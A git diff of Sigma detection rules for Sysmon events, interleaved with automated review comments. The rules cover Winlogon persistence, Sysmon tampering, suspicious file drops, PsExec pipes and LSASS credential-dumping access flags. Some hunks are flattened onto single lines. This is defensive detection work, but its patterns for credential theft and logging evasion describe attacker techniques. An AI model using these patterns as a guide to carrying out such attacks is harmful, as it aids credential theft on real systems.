+++ b/sigma/sysmon/registry/registry_set/registry_set_winlogon_notify_key.yml
@@ -1,13 +1,9 @@
 title: Winlogon Notify Key Logon Persistence
 id: bbf59793-6efb-4fa1-95ca-a7d288e52c88
 status: test
-description: 'Adversaries may abuse features of Winlogon to execute DLLs and/or executables
- when a user logs in.
-
- Winlogon.exe is a Windows component responsible for actions at logon/logoff as
- well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.
-
- '
+description: |
+ Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in.
+ Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.004/T1547.004.md#atomic-test-3---winlogon-notify-key-logon-persistence---powershell
 author: frack113
diff --git a/sigma/sysmon/sysmon/sysmon_config_modification.yml b/sigma/sysmon/sysmon/sysmon_config_modification.yml
index df300db41..b4aaca0a6 100644
--- a/sigma/sysmon/sysmon/sysmon_config_modification.yml
+++ b/sigma/sysmon/sysmon/sysmon_config_modification.yml
@@ -1,8 +1,7 @@
 title: Sysmon Configuration Change
 id: 8ac03a65-6c84-4116-acad-dc1558ff7a77
 status: test
-description: Detects a Sysmon configuration change, which could be the result of a
- legitimate reconfiguration or someone trying manipulate the configuration
+description: Detects a Sysmon configuration change, which could be the result of a legitimate reconfiguration or someone trying manipulate the configuration
 references:
 - https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon
 author: frack113
@@ -18,6 +17,10 @@ detection:
 Channel: Microsoft-Windows-Sysmon/Operational
 selection:
 EventID: 16
+ # To avoid FP just add
+ # filter:
+ # ConfigurationFileHash: 'SHA256=The_Hash_Of_Your_Valid_Config_XML'
+ # condition: selection and not filter
 condition: sysmon and selection
 falsepositives:
 - Legitimate administrative action
diff --git a/sigma/sysmon/sysmon/sysmon_config_modification_error.yml b/sigma/sysmon/sysmon/sysmon_config_modification_error.yml
index e7c512317..10a40f865 100644
--- a/sigma/sysmon/sysmon/sysmon_config_modification_error.yml
+++ b/sigma/sysmon/sysmon/sysmon_config_modification_error.yml
@@ -1,8 +1,7 @@
 title: Sysmon Configuration Error
 id: 815cd91b-7dbc-4247-841a-d7dd1392b0a8
 status: test
-description: Detects when an adversary is trying to hide it's action from Sysmon logging
- based on error messages
+description: Detects when an adversary is trying to hide it's action from Sysmon logging based on error messages
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md
 - https://talesfrominfosec.blogspot.com/2017/12/killing-sysmon-silently.html
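Review bot: The tuning recipe added as comments under `EventID: 16` in the second hunk of sysmon_config_modification.yml ends with `# condition: selection and not filter`, which drops the `sysmon` selector that the live `condition: sysmon and selection` line uses and which, judging by the surrounding context, carries the Channel restriction; anyone pasting the recipe as written would match EventID 16 from any channel. The line should read `# condition: sysmon and selection and not filter`. It would also help to say that `ConfigurationFileHash` can be given as a list when more than one approved configuration is deployed, rather than the single placeholder value shown, and that the `filter:` block must sit at the same level as `selection:` rather than inside it.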
diff --git a/sigma/sysmon/sysmon/sysmon_config_modification_status.yml b/sigma/sysmon/sysmon/sysmon_config_modification_status.yml
index 5d5cd3a6b..de5432e08 100644
--- a/sigma/sysmon/sysmon/sysmon_config_modification_status.yml
+++ b/sigma/sysmon/sysmon/sysmon_config_modification_status.yml
@@ -1,8 +1,7 @@
 title: Sysmon Configuration Modification
 id: 1f2b5353-573f-4880-8e33-7d04dcf97744
 status: test
-description: Detects when an attacker tries to hide from Sysmon by disabling or stopping
- it
+description: Detects when an attacker tries to hide from Sysmon by disabling or stopping it
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md
 - https://talesfrominfosec.blogspot.com/2017/12/killing-sysmon-silently.html
diff --git a/sigma/sysmon/sysmon/sysmon_file_block_executable.yml b/sigma/sysmon/sysmon/sysmon_file_block_executable.yml
index ffc9a1d06..32507abc4 100644
--- a/sigma/sysmon/sysmon/sysmon_file_block_executable.yml
+++ b/sigma/sysmon/sysmon/sysmon_file_block_executable.yml
@@ -1,8 +1,7 @@
 title: Sysmon Blocked Executable
 id: 23b71bc5-953e-4971-be4c-c896cda73fc2
 status: experimental
-description: Triggers on any Sysmon "FileBlockExecutable" event, which indicates a
- violation of the configured block policy
+description: Triggers on any Sysmon "FileBlockExecutable" event, which indicates a violation of the configured block policy
 references:
 - https://medium.com/@olafhartong/sysmon-14-0-fileblockexecutable-13d7ba3dff3e
 author: Nasreddine Bencherchali (Nextron Systems)
@@ -18,7 +17,7 @@ detection:
 sysmon:
 Channel: Microsoft-Windows-Sysmon/Operational
 selection:
- EventID: 27
+ EventID: 27 # this is fine, we want to match any FileBlockExecutable event
 condition: sysmon and selection
 falsepositives:
 - Unlikely
diff --git a/sigma/sysmon/sysmon/sysmon_file_block_shredding.yml b/sigma/sysmon/sysmon/sysmon_file_block_shredding.yml
index bb81e43ec..ef9c4ecbe 100644
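Review bot: The trailing comment `# this is fine, we want to match any FileBlockExecutable event` on the `EventID: 27` line of sysmon_file_block_executable.yml records that the selection is intentionally unfiltered but not why, and "this is fine" reads as a note to a linter rather than to the next maintainer. Naming the event and the reason does both jobs, e.g. `# EventID 27 = FileBlockExecutable; every such event is a block-policy violation, so no narrower selection is wanted`. The same wording is added for EventID 28 and 29 in sysmon_file_block_shredding.yml and sysmon_file_executable_detected.yml in the next file section and would benefit from the same treatment, with the reason adjusted for each event type.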
--- a/sigma/sysmon/sysmon/sysmon_file_block_shredding.yml
+++ b/sigma/sysmon/sysmon/sysmon_file_block_shredding.yml
@@ -1,8 +1,7 @@
 title: Sysmon Blocked File Shredding
 id: c3e5c1b1-45e9-4632-b242-27939c170239
 status: experimental
-description: Triggers on any Sysmon "FileBlockShredding" event, which indicates a
- violation of the configured shredding policy.
+description: Triggers on any Sysmon "FileBlockShredding" event, which indicates a violation of the configured shredding policy.
 references:
 - https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon
 author: frack113
@@ -17,7 +16,7 @@ detection:
 sysmon:
 Channel: Microsoft-Windows-Sysmon/Operational
 selection:
- EventID: 28
+ EventID: 28 # this is fine, we want to match any FileBlockShredding event
 condition: sysmon and selection
 falsepositives:
 - Unlikely
diff --git a/sigma/sysmon/sysmon/sysmon_file_executable_detected.yml b/sigma/sysmon/sysmon/sysmon_file_executable_detected.yml
index 0a11c5aa3..c4ba26ff5 100644
--- a/sigma/sysmon/sysmon/sysmon_file_executable_detected.yml
+++ b/sigma/sysmon/sysmon/sysmon_file_executable_detected.yml
@@ -1,8 +1,7 @@
 title: Sysmon File Executable Creation Detected
 id: 693a44e9-7f26-4cb6-b787-214867672d3a
 status: experimental
-description: Triggers on any Sysmon "FileExecutableDetected" event, which triggers
- every time a PE that is monitored by the config is created.
+description: Triggers on any Sysmon "FileExecutableDetected" event, which triggers every time a PE that is monitored by the config is created.
 references:
 - https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon
 - https://medium.com/@olafhartong/sysmon-15-0-file-executable-detected-40fd64349f36
@@ -18,7 +17,7 @@ detection:
 sysmon:
 Channel: Microsoft-Windows-Sysmon/Operational
 selection:
- EventID: 29
+ EventID: 29 # this is fine, we want to match any FileExecutableDetected event
 condition: sysmon and selection
 falsepositives:
 - Unlikely
diff --git a/sigma/sysmon/threat-hunting/create_remote_thread/create_remote_thread_win_powershell_generic.yml b/sigma/sysmon/threat-hunting/create_remote_thread/create_remote_thread_win_powershell_generic.yml
index 67850d37b..d5d9ff804 100644
--- a/sigma/sysmon/threat-hunting/create_remote_thread/create_remote_thread_win_powershell_generic.yml
+++ b/sigma/sysmon/threat-hunting/create_remote_thread/create_remote_thread_win_powershell_generic.yml
@@ -1,11 +1,10 @@
 title: Remote Thread Creation Via PowerShell
 id: eeb2e3dc-c1f4-40dd-9bd5-149ee465ad50
 related:
- - id: 99b97608-3e21-4bfe-8217-2a127c396a0e
- type: derived
+ - id: 99b97608-3e21-4bfe-8217-2a127c396a0e
+ type: derived
 status: test
-description: Detects the creation of a remote thread from a Powershell process to
- another process
+description: Detects the creation of a remote thread from a Powershell process to another process
 references:
 - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse
 author: Nikita Nazarov, oscd.community
diff --git a/sigma/sysmon/threat-hunting/file/file_delete/file_delete_win_zone_identifier_ads.yml b/sigma/sysmon/threat-hunting/file/file_delete/file_delete_win_zone_identifier_ads.yml
index 75278fe61..37330cc97 100644
--- a/sigma/sysmon/threat-hunting/file/file_delete/file_delete_win_zone_identifier_ads.yml
+++ b/sigma/sysmon/threat-hunting/file/file_delete/file_delete_win_zone_identifier_ads.yml
@@ -1,12 +1,10 @@ title: ADS Zone.Identifier Deleted id: 7eac0a16-5832-4e81-865f-0268a6d19e4b related: - - id: 3109530e-ab47-4cc6-a953-cac5ebcc93ae - type: similar + - id: 3109530e-ab47-4cc6-a953-cac5ebcc93ae + type: similar status: experimental -description: Detects the deletion of the "Zone.Identifier" ADS. Attackers can leverage - this in order to bypass security restrictions that make use of the ADS such as - Microsoft Office apps. +description: Detects the deletion of the "Zone.Identifier" ADS. Attackers can leverage this in order to bypass security restrictions that make use of the ADS such as Microsoft Office apps. references: - https://securityliterate.com/how-malware-abuses-the-zone-identifier-to-circumvent-detection-and-analysis/ author: frack113 diff --git a/sigma/sysmon/threat-hunting/file/file_event/file_event_win_dump_file_creation.yml b/sigma/sysmon/threat-hunting/file/file_event/file_event_win_dump_file_creation.yml index 292da8e4e..231260602 100644 --- a/sigma/sysmon/threat-hunting/file/file_event/file_event_win_dump_file_creation.yml +++ b/sigma/sysmon/threat-hunting/file/file_event/file_event_win_dump_file_creation.yml @@ -1,9 +1,7 @@ title: DMP/HDMP File Creation id: 3a525307-d100-48ae-b3b9-0964699d7f97 status: experimental -description: Detects the creation of a file with the ".dmp"/".hdmp" extension. Often - created by software during a crash. Memory dumps can sometimes contain sensitive - information such as credentials. It's best to determine the source of the crash. +description: Detects the creation of a file with the ".dmp"/".hdmp" extension. Often created by software during a crash. Memory dumps can sometimes contain sensitive information such as credentials. It's best to determine the source of the crash. references: - https://learn.microsoft.com/en-us/windows/win32/wer/collecting-user-mode-dumps author: Nasreddine Bencherchali (Nextron Systems) 
diff --git a/sigma/sysmon/threat-hunting/file/file_event/file_event_win_susp_binary_dropper.yml b/sigma/sysmon/threat-hunting/file/file_event/file_event_win_susp_binary_dropper.yml index bd0600218..b0cc8114a 100644 --- a/sigma/sysmon/threat-hunting/file/file_event/file_event_win_susp_binary_dropper.yml +++ b/sigma/sysmon/threat-hunting/file/file_event/file_event_win_susp_binary_dropper.yml @@ -31,14 +31,22 @@ detection: - :\WINDOWS\system32\Dism.exe - :\Windows\System32\wuauclt.exe filter_main_update: + # Security_UserID: S-1-5-18 + # Example: + # TargetFilename: C:\Windows\SoftwareDistribution\Download\803d1df4c931df4f3e50a022cda56e88\WindowsUpdateBox.exe Image|endswith: :\WINDOWS\system32\svchost.exe TargetFilename|contains: :\Windows\SoftwareDistribution\Download\ filter_main_upgrade: Image|endswith: :\Windows\system32\svchost.exe TargetFilename|contains|all: + # Example: + # This example was seen during windows upgrade + # TargetFilename: :\WUDownloadCache\803d1df4c931df4f3e50a022cda56e29\WindowsUpdateBox.exe - :\WUDownloadCache\ - \WindowsUpdateBox.exe filter_main_windows_update_box: + # This FP was seen during Windows Upgrade + # ParentCommandLine: C:\WINDOWS\system32\svchost.exe -k netsvcs -p -s wuauserv Image|contains: :\WINDOWS\SoftwareDistribution\Download\ Image|endswith: \WindowsUpdateBox.Exe TargetFilename|contains: :\$WINDOWS.~BT\Sources\ @@ -46,12 +54,12 @@ detection: Image|contains: :\Windows\WinSxS\ Image|endswith: \TiWorker.exe filter_main_programfiles: - - Image|contains: - - :\Program Files\ - - :\Program Files (x86)\ - - TargetFilename|contains: - - :\Program Files\ - - :\Program Files (x86)\ + - Image|contains: + - :\Program Files\ + - :\Program Files (x86)\ + - TargetFilename|contains: + - :\Program Files\ + - :\Program Files (x86)\ filter_main_defender: Image|contains: - :\ProgramData\Microsoft\Windows Defender\ 
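Review bot: The comments added under `filter_main_update` and `filter_main_windows_update_box` document properties (`Security_UserID: S-1-5-18`, `ParentCommandLine: C:\WINDOWS\system32\svchost.exe -k netsvcs -p -s wuauserv`) that the filters themselves never check, so a reader may believe the exclusion is narrower than it is; `filter_main_update` only requires an `svchost.exe` image and a target path under `SoftwareDistribution\Download\`. As far as I know neither field is carried by the Sysmon file-create event this rule consumes, so these values look like context from another source rather than something the filter could match on. Suggest labelling them as such, e.g. `# Observed context, not matched by this filter: Security_UserID S-1-5-18` and `# Observed context, not matched by this filter: ParentCommandLine ... -s wuauserv`. The `detection` block and its `condition` are outside this hunk.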
@@ -65,6 +73,12 @@ detection: - \AppData\Local\Microsoft\Teams\stage\Squirrel.exe - \AppData\Local\Microsoft\SquirrelTemp\tempb\ filter_main_mscorsvw: + # Example: + # ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe" ExecuteQueuedItems /LegacyServiceBehavior + # Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe + # TargetFilename: C:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\4f8c-0\MSBuild.exe + # TargetFilename: C:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\49bc-0\testhost.net47.x86.exe + # TargetFilename: C:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\39d8-0\fsc.exe Image|contains: :\Windows\Microsoft.NET\Framework\ Image|endswith: \mscorsvw.exe TargetFilename|contains: :\Windows\assembly\NativeImages_ @@ -74,10 +88,13 @@ detection: TargetFilename|contains: \.vscode\extensions\ filter_main_githubdesktop: Image|endswith: \AppData\Local\GitHubDesktop\Update.exe + # Example TargetFileName: + # \AppData\Local\SquirrelTemp\tempb\lib\net45\GitHubDesktop_ExecutionStub.exe + # \AppData\Local\SquirrelTemp\tempb\lib\net45\squirrel.exe TargetFilename|contains: \AppData\Local\SquirrelTemp\ filter_main_windows_temp: - - Image|contains: :\WINDOWS\TEMP\ - - TargetFilename|contains: :\WINDOWS\TEMP\ + - Image|contains: :\WINDOWS\TEMP\ + - TargetFilename|contains: :\WINDOWS\TEMP\ filter_optional_python: Image|contains: \Python27\python.exe TargetFilename|contains: @@ -88,8 +105,8 @@ detection: Image|contains: \AppData\Local\SquirrelTemp\Update.exe TargetFilename|contains: \AppData\Local filter_main_temp_installers: - - Image|contains: \AppData\Local\Temp\ - - TargetFilename|contains: \AppData\Local\Temp\ + - Image|contains: \AppData\Local\Temp\ + - TargetFilename|contains: \AppData\Local\Temp\ filter_optional_chrome: Image|endswith: \ChromeSetup.exe TargetFilename|contains: \Google 
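Review bot: The example `Image` added under `filter_main_mscorsvw` (`C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe`) is not matched by the filter's own `Image|contains: :\Windows\Microsoft.NET\Framework\`, because the trailing backslash excludes the `Framework64\` directory; the documented 64-bit case therefore still fires. If the 64-bit ngen worker is an accepted false positive, the filter needs both prefixes, `Image|contains:` / `- :\Windows\Microsoft.NET\Framework\` / `- :\Windows\Microsoft.NET\Framework64\`, with the understanding that this also widens the exclusion to 64-bit native-image generation. If the 32-bit restriction is deliberate, the example comment should instead show a `Framework\` path so the two agree. The enclosing `detection` block starts and ends outside this hunk.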
@@ -99,6 +116,7 @@ detection: TargetFilename|contains: :\Windows\assembly condition: file_event and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: + # Please contribute to FP to increase the level - Software installers - Update utilities - 32bit applications launching their 64bit versions diff --git a/sigma/sysmon/threat-hunting/file/file_event/file_event_win_vscode_tunnel_indicators.yml b/sigma/sysmon/threat-hunting/file/file_event/file_event_win_vscode_tunnel_indicators.yml index 79382edd9..6e6244014 100644 --- a/sigma/sysmon/threat-hunting/file/file_event/file_event_win_vscode_tunnel_indicators.yml +++ b/sigma/sysmon/threat-hunting/file/file_event/file_event_win_vscode_tunnel_indicators.yml @@ -1,11 +1,8 @@ title: VsCode Code Tunnel Execution File Indicator id: 9661ec9d-4439-4a7a-abed-d9be4ca43b6d status: experimental -description: 'Detects the creation of a file with the name "code_tunnel.json" which - indicate execution and usage of VsCode tunneling utility. Attackers can abuse - this functionality to establish a C2 channel - - ' +description: | + Detects the creation of a file with the name "code_tunnel.json" which indicate execution and usage of VsCode tunneling utility. Attackers can abuse this functionality to establish a C2 channel references: - https://ipfyx.fr/post/visual-studio-code-tunnel/ - https://badoption.eu/blog/2023/01/31/code_c2.html diff --git a/sigma/sysmon/threat-hunting/file/file_event/file_event_win_webdav_tmpfile_creation.yml b/sigma/sysmon/threat-hunting/file/file_event/file_event_win_webdav_tmpfile_creation.yml index 3fcbaab58..db69b181b 100644 --- a/sigma/sysmon/threat-hunting/file/file_event/file_event_win_webdav_tmpfile_creation.yml +++ b/sigma/sysmon/threat-hunting/file/file_event/file_event_win_webdav_tmpfile_creation.yml 
@@ -1,8 +1,7 @@ title: WebDAV Temporary Local File Creation id: 4c55738d-72d8-490e-a2db-7969654e375f status: experimental -description: Detects the creation of WebDAV temporary files with potentially suspicious - extensions +description: Detects the creation of WebDAV temporary files with potentially suspicious extensions references: - https://www.trellix.com/en-us/about/newsroom/stories/research/beyond-file-search-a-novel-method.html - https://micahbabinski.medium.com/search-ms-webdav-and-chill-99c5b23ac462 diff --git a/sigma/sysmon/threat-hunting/image_load/image_load_dll_amsi_uncommon_process.yml b/sigma/sysmon/threat-hunting/image_load/image_load_dll_amsi_uncommon_process.yml index 6f167da7f..738860e36 100644 --- a/sigma/sysmon/threat-hunting/image_load/image_load_dll_amsi_uncommon_process.yml +++ b/sigma/sysmon/threat-hunting/image_load/image_load_dll_amsi_uncommon_process.yml @@ -44,12 +44,11 @@ detection: - :\Windows\Microsoft.NET\Framework64\ Image|endswith: \ngentask.exe filter_main_null: - Image: null + Image: filter_main_empty: Image: '' condition: image_load and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - - Legitimate third party apps installed in "ProgramData" and "AppData" might generate - some false positives. Apply additional filters accordingly + - Legitimate third party apps installed in "ProgramData" and "AppData" might generate some false positives. Apply additional filters accordingly level: low ruletype: Sigma diff --git a/sigma/sysmon/threat-hunting/image_load/image_load_dll_system_drawing_load.yml b/sigma/sysmon/threat-hunting/image_load/image_load_dll_system_drawing_load.yml index a103e90e2..3b944c19e 100644 --- a/sigma/sysmon/threat-hunting/image_load/image_load_dll_system_drawing_load.yml +++ b/sigma/sysmon/threat-hunting/image_load/image_load_dll_system_drawing_load.yml 
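Review bot: `Image:` with no value under `filter_main_null` now relies on YAML's implicit null and, next to the explicit `Image: ''` in `filter_main_empty`, reads like a value that was deleted by accident; the previous `Image: null` stated the intent. Both forms parse to the same null, so this is a style point only, but I would keep the explicit spelling or annotate it: `Image: null # match events where the Image field is absent/null`. The `detection` block this belongs to starts outside the hunk.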
@@ -1,8 +1,7 @@ title: System Drawing DLL Load id: 666ecfc7-229d-42b8-821e-1a8f8cb7057c status: test -description: Detects processes loading "System.Drawing.ni.dll". This could be an indicator - of potential Screen Capture. +description: Detects processes loading "System.Drawing.ni.dll". This could be an indicator of potential Screen Capture. references: - https://github.com/OTRF/detection-hackathon-apt29/issues/16 - https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/7.A.1_3B4E5808-3C71-406A-B181-17B0CE3178C9.md @@ -25,8 +24,6 @@ detection: ImageLoaded|endswith: \System.Drawing.ni.dll condition: image_load and selection falsepositives: - - False positives are very common from system and third party applications, activity - needs to be investigated. This rule is best correlated with other events to - increase the level of suspiciousness + - False positives are very common from system and third party applications, activity needs to be investigated. This rule is best correlated with other events to increase the level of suspiciousness level: low ruletype: Sigma diff --git a/sigma/sysmon/threat-hunting/image_load/image_load_office_excel_xll_load.yml b/sigma/sysmon/threat-hunting/image_load/image_load_office_excel_xll_load.yml index 5150f951f..76bd5bedf 100644 --- a/sigma/sysmon/threat-hunting/image_load/image_load_office_excel_xll_load.yml +++ b/sigma/sysmon/threat-hunting/image_load/image_load_office_excel_xll_load.yml @@ -23,7 +23,6 @@ detection: ImageLoaded|endswith: .xll condition: image_load and selection falsepositives: - - The rules is only looking for ".xll" loads. So some false positives are expected - with legitimate and allowed XLLs + - The rules is only looking for ".xll" loads. So some false positives are expected with legitimate and allowed XLLs level: low ruletype: Sigma 
diff --git a/sigma/sysmon/threat-hunting/network_connection/net_connection_win_dfsvc_suspicious_ip.yml b/sigma/sysmon/threat-hunting/network_connection/net_connection_win_dfsvc_suspicious_ip.yml index 1ec2a83c2..ef4f3a47d 100644 --- a/sigma/sysmon/threat-hunting/network_connection/net_connection_win_dfsvc_suspicious_ip.yml +++ b/sigma/sysmon/threat-hunting/network_connection/net_connection_win_dfsvc_suspicious_ip.yml @@ -1,8 +1,7 @@ title: Dfsvc.EXE Network Connection To Non-Local IPs id: 3c21219b-49b5-4268-bce6-c914ed50f09c status: experimental -description: Detects network connections from "dfsvc.exe" used to handled ClickOnce - applications to non-local IPs +description: Detects network connections from "dfsvc.exe" used to handled ClickOnce applications to non-local IPs references: - https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5 author: Nasreddine Bencherchali (Nextron Systems) @@ -45,15 +44,13 @@ detection: - 192.168. filter_main_local_ipv6: DestinationIp|startswith: - - ::1 - - 0:0:0:0:0:0:0:1 - - fc - - fd - - 'fe80:' + - ::1 # IPv6 loopback variant + - 0:0:0:0:0:0:0:1 # IPv6 loopback variant + - fc # private address range fc00::/7 + - fd # private address range fc00::/7 + - 'fe80:' # link-local address condition: network_connection and (selection and not 1 of filter_main_*) falsepositives: - - False positives are expected from ClickOnce manifests hosted on public IPs and - domains. Apply additional filters for the accepted IPs in your environement - as necessary + - False positives are expected from ClickOnce manifests hosted on public IPs and domains. Apply additional filters for the accepted IPs in your environement as necessary level: medium ruletype: Sigma diff --git a/sigma/sysmon/threat-hunting/pipe_created/pipe_created_sysinternals_psexec_default_pipe.yml b/sigma/sysmon/threat-hunting/pipe_created/pipe_created_sysinternals_psexec_default_pipe.yml index fcacaa8fb..fe7ad71b7 100644 
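Review bot: The new `# IPv6 loopback variant` comments on `::1` and `0:0:0:0:0:0:0:1` describe a single address, but the modifier is `DestinationIp|startswith`, so each entry also excludes any destination whose textual form merely begins with that string (anything starting with `::1`, for example). If loopback only is intended, an exact match is tighter, e.g. a separate `filter_main_local_ipv6_loopback:` holding `DestinationIp: ['::1', '0:0:0:0:0:0:0:1']`; if the prefix behaviour is accepted, the comment should say so (`# prefix match: loopback and anything starting with ::1`). The `fc`/`fd`/`fe80:` comments are accurate for a prefix match and can stay as written.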
--- a/sigma/sysmon/threat-hunting/pipe_created/pipe_created_sysinternals_psexec_default_pipe.yml +++ b/sigma/sysmon/threat-hunting/pipe_created/pipe_created_sysinternals_psexec_default_pipe.yml @@ -1,8 +1,8 @@ title: PsExec Default Named Pipe id: f3f3a972-f982-40ad-b63c-bca6afdfad7c related: - - id: 42c575ea-e41e-41f1-b248-8093c3e82a28 - type: derived + - id: 42c575ea-e41e-41f1-b248-8093c3e82a28 + type: derived status: test description: Detects PsExec service default pipe creation references: @@ -20,12 +20,7 @@ tags: logsource: category: pipe_created product: windows - definition: Note that you have to configure logging for Named Pipe Events in Sysmon - config (Event ID 17 and Event ID 18). The basic configuration is in popular - sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but - it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, - https://github.com/olafhartong/sysmon-modular. How to test detection? You - can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 + definition: Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 detection: pipe_created: EventID: diff --git a/sigma/sysmon/threat-hunting/process_access/proc_access_win_lsass_powershell_access.yml b/sigma/sysmon/threat-hunting/process_access/proc_access_win_lsass_powershell_access.yml index 5ef7c5ca5..1924062d0 100644 
--- a/sigma/sysmon/threat-hunting/process_access/proc_access_win_lsass_powershell_access.yml +++ b/sigma/sysmon/threat-hunting/process_access/proc_access_win_lsass_powershell_access.yml @@ -1,13 +1,12 @@ title: Potential Credential Dumping Attempt Via PowerShell id: 0f920ebe-7aea-4c54-b202-9aa0c609cfe5 related: - - id: 3f07b9d1-2082-4c56-9277-613a621983cc - type: obsoletes - - id: fb656378-f909-47c1-8747-278bf09f4f4f - type: similar + - id: 3f07b9d1-2082-4c56-9277-613a621983cc + type: obsoletes + - id: fb656378-f909-47c1-8747-278bf09f4f4f + type: similar status: test -description: Detects a PowerShell process requesting access to "lsass.exe", which - can be indicative of potential credential dumping attempts +description: Detects a PowerShell process requesting access to "lsass.exe", which can be indicative of potential credential dumping attempts references: - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse author: oscd.community, Natalia Shornikova diff --git a/sigma/sysmon/threat-hunting/process_access/proc_access_win_lsass_susp_source_process.yml b/sigma/sysmon/threat-hunting/process_access/proc_access_win_lsass_susp_source_process.yml index c0729acf4..879bdd373 100644 --- a/sigma/sysmon/threat-hunting/process_access/proc_access_win_lsass_susp_source_process.yml +++ b/sigma/sysmon/threat-hunting/process_access/proc_access_win_lsass_susp_source_process.yml 
@@ -1,8 +1,7 @@ title: LSASS Access From Program In Potentially Suspicious Folder id: fa34b441-961a-42fa-a100-ecc28c886725 status: experimental -description: Detects process access to LSASS memory with suspicious access flags and - from a potentially suspicious folder +description: Detects process access to LSASS memory with suspicious access flags and from a potentially suspicious folder references: - https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights - https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow @@ -51,7 +50,7 @@ detection: - BA - DA - FA - - '0x14C2' + - '0x14C2' # https://github.com/b4rtik/ATPMiniDump/blob/76304f93b390af3bb66e4f451ca16562a479bdc9/ATPMiniDump/ATPMiniDump.c - FF SourceImage|contains: - \Temp\ @@ -130,14 +129,13 @@ detection: TargetImage|endswith: \winlogon.exe GrantedAccess: '0x1fffff' filter_optional_adobe_arm_helper: - SourceImage|contains: + SourceImage|contains: # Example path: 'C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\Temp\2092867405\AdobeARMHelper.exe' - :\Program Files\Common Files\Adobe\ARM\ - :\Program Files (x86)\Common Files\Adobe\ARM\ SourceImage|endswith: \AdobeARMHelper.exe GrantedAccess: '0x1410' condition: process_access and (selection and not 1 of filter_optional_*) falsepositives: - - Updaters and installers are typical false positives. Apply custom filters depending - on your environment + - Updaters and installers are typical false positives. Apply custom filters depending on your environment level: medium ruletype: Sigma diff --git a/sigma/sysmon/threat-hunting/process_access/proc_access_win_lsass_uncommon_access_flag.yml b/sigma/sysmon/threat-hunting/process_access/proc_access_win_lsass_uncommon_access_flag.yml index a0d43651b..bcd7d8978 100644 --- a/sigma/sysmon/threat-hunting/process_access/proc_access_win_lsass_uncommon_access_flag.yml 
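Review bot: The comment added to `'0x14C2'` is a bare source URL, so whoever tunes this list still has to open it to learn what the mask represents; the other values in the list carry no explanation either, but this one now looks documented without being so. The value decomposes into PROCESS_CREATE_THREAD (0x0002) | PROCESS_DUP_HANDLE (0x0040) | PROCESS_CREATE_PROCESS (0x0080) | PROCESS_QUERY_INFORMATION (0x0400) | PROCESS_QUERY_LIMITED_INFORMATION (0x1000), i.e. no PROCESS_VM_READ, which is what makes it an uncommon way to obtain a dumpable handle; a comment such as `# 0x14C2 = CREATE_THREAD|DUP_HANDLE|CREATE_PROCESS|QUERY_INFORMATION|QUERY_LIMITED_INFORMATION, seen with minidump-by-handle tooling (see <url>)` says this without a click. The enclosing `GrantedAccess` list and the `selection` it belongs to start outside this hunk.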
+++ b/sigma/sysmon/threat-hunting/process_access/proc_access_win_lsass_uncommon_access_flag.yml @@ -1,11 +1,10 @@ title: Uncommon GrantedAccess Flags On LSASS id: 678dfc63-fefb-47a5-a04c-26bcf8cc9f65 related: - - id: 32d0d3e2-e58d-4d41-926b-18b520b2b32d - type: obsoletes + - id: 32d0d3e2-e58d-4d41-926b-18b520b2b32d + type: obsoletes status: test -description: Detects process access to LSASS memory with uncommon access flags 0x410 - and 0x01410 +description: Detects process access to LSASS memory with uncommon access flags 0x410 and 0x01410 references: - https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights - https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow @@ -31,6 +30,7 @@ detection: selection: TargetImage|endswith: \lsass.exe GrantedAccess|endswith: '10' + # Absolute paths to programs that cause false positives filter1: SourceImage: - C:\Program Files\Common Files\McAfee\MMSSHost\MMSSHOST.exe @@ -45,25 +45,31 @@ detection: - C:\WINDOWS\system32\wbem\wmiprvse.exe - C:\Windows\SysWOW64\msiexec.exe - C:\Windows\sysWOW64\wbem\wmiprvse.exe + # Windows Defender filter2: SourceImage|startswith: C:\ProgramData\Microsoft\Windows Defender\ SourceImage|endswith: 